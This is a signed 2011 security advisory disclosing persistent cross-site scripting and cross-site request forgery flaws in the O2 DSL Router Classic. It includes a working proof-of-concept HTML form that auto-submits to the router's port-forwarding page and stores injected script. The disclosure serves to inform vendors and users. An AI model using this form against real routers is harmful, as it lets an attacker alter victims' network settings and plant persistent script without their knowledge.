O2 classic router: persistent cross site scripting (XSS) and cross site
request forgery (CSRF)
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482
http://int21.de/cve/CVE-2011-0746-o2-router.html
Description
The default DSL router shipped by the german company O2 is completely
vulnerable to persistent cross site scripting (XSS) and cross site
request forgery (CSRF). The device is produced by ZyXEL, it seems it
has no other name than the brand "O2 DSL Router Classic".
As an example, the form at /Forms/PortForwarding_Edit_1 accepts
javascript code for the parameter PortRule_Name, which will be
permanently stored. Also, the form has no protection against CSRF.
A sample code that will inject permanent javascript when called by a
user who is logged into his router:
<form id="form1" method="post"
action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input
name="PortRule_Name" value='"><script>alert(7)</script>'> <input
name="PortRule_SPort" value="77"> <input name="PortRule_EPort"
value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" >
<script>
var frm = document.getElementById("form1");
frm.submit();
</script>
This is just an example, all forms in the router interface are
vulnerable to CSRF and, if they accept text input, to XSS.
The vulnerability has been disclosed to O2 in advance without any reply.
Disclosure Timeline
2011-02-03: Vendor contacted
2011-04-07: Published advisory
This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de,
of schokokeks.org webhosting.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (GNU/Linux)
iQIcBAEBCAAGBQJNnfb6AAoJEKWIAHK7tR5CRUQP/RisVg6f0fntQIMgLuyqL6zZ
JXb79qiti1ac63s2RtN05ls8tlTOi6ixIzchtogXvJiBh4xoN+iaQeOAYSZHe9VQ
97kvnfRlZHE3pt168R+/vdThkhgtenzqLorUENZFpODuRii5lPfQZPIaB+yeSZo/
x5SWVnONgB3KkBuUQokTBogRT1t2D5+gu9+mk/aJAWt8ww7YPCalb7bwetBKDVZs
O2tVcvWswgm2DhHW5D7aXWAEvuczdmZhhqGz/bMF2Kt7VwqZvvhkar2O1voCZUlg
wcDzueMakjoSWHipQgGdMYVKiuMAfWXGmjl1Y++3ODnj7yCHLl70+cYbetZJnSjp
fQbz/Vv6t/RnINR6ncRHx1wuIRVCO72qL+rfhn4jwuriHlL85wCfbaVzzgyoAcmz
LXlfgIJzH2qohQ2ujFGAclNVSNXcarsaSaPoiR0j0+XbnYTTHWVyZPleicp8h31W
w9fUbb28PVyj26vcfWOPRp0kwcevCh4NcjyyNqTFJp+j5802AasTZRxNJ6ywWQHn
tHinbYFoGm12EDB1Qdyp76iCs7zl4s30vQClfW9IDGdf3bPkaer2UGeSamjlUfN0
M1KnFt8yyQtsyXGIdRkP2voOg6OkCQ+s5OQdVrdUpLiOEbSJceoNj4jUjBhxNBTy
CEivgW6vyIGPcyOB1sPY
=jk2K
-----END PGP SIGNATURE-----